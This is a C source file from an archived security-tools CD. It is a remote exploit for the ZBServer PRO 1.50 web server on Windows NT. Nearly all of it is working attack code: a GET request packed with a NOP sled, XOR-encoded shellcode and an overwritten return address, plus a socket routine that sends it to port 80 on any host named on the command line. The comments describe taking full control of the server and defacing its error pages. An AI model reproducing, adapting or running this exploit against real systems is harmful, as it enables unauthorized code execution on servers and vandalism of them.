home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / zbsoft / slzbserv.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  5KB  |  135 lines

  1. /** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)
  2.  **
  3.  ** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.
  4.  ** When you attacks a vulnerable server you can run abitrary code
  5.  ** inside. Firstly, sploit creates an advisory file. It's information
  6.  ** for administrative use. Later, exploit restores and kills
  7.  ** overflowed thread but before it patchs some error information so
  8.  ** all error pages will appear like hacked pages.
  9.  **
  10.  ** Compile on Debian with kernel 2.2.12: gcc -o  slzbserv slzbserv.c
  11.  ** run: ./slzbserv hostname
  12.  **
  13.  ** http://mareasvivas.cjb.net / http://www.deepzone.org
  14.  **
  15.  ** Coded by |Zan | izan@galaxycorp.com
  16.  **
  17.  **/
  18.  
  19.  
  20. #include <stdio.h>
  21. #include <unistd.h>
  22. #include <sys/socket.h>
  23. #include <netinet/in.h>
  24. #include <sys/errno.h>
  25. #include <netdb.h>
  26.  
  27. #define _PORT   80
  28. #define _TamBuf 770
  29.  
  30. char crash[] = 
  31. "GET /"
  32. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  33. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  34. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  35. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  36. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  37. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  38. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  39. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  40. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  41. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  42. "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"
  43. "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"
  44. "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"
  45. "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"
  46. "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"
  47. "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"
  48. "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"
  49. "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"
  50. "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"
  51. "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"
  52. "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"
  53. "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"
  54. "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"
  55. "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"
  56. "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"
  57. "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"
  58. "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"
  59. "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"
  60. "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"
  61. "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"
  62. "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"
  63. "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"
  64. "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"
  65. "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"
  66. "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"
  67. "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"
  68. "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"
  69. "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"
  70. "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"
  71. "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"
  72. "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"
  73. "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"
  74. "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"
  75. "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"
  76. "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"
  77. "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"
  78. "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"
  79. "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"
  80. "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"
  81. "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"
  82. "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"
  83. "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"
  84. "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"
  85. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  86. "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";
  87.  
  88.  
  89. int     sock;
  90. struct  sockaddr_in sock_a;
  91. struct  hostent *host;
  92.  
  93. int main (int argc, char *argv[]) {
  94.  
  95.  printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");
  96.  printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");
  97.  printf("Coded by -=[ |Zan ]=-  izan@galaxycorp.com - izan@deepzone.org\n\n");
  98.  
  99.  if(argc < 2) {
  100.    fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
  101.    exit(0);
  102.   }
  103.  
  104.  
  105.  if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
  106.     perror("gethostbyname");
  107.     exit(-1);
  108.   }
  109.  
  110.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
  111.     perror("create socket");
  112.     exit(-1);
  113.   }
  114.  
  115.  sock_a.sin_family=AF_INET;
  116.  sock_a.sin_port=htons(_PORT);
  117.  memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
  118.  if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
  119.     perror("create connect");
  120.     exit(-1);
  121.   }
  122.  
  123.   fflush(stdout);
  124.  
  125.   write(sock,crash,_TamBuf);
  126.   write(sock,"\n\n", 2);
  127.   printf("done.\n\n");
  128.  
  129. }
  130.  
  131.  
  132.  
  133.  
  134.  
  135.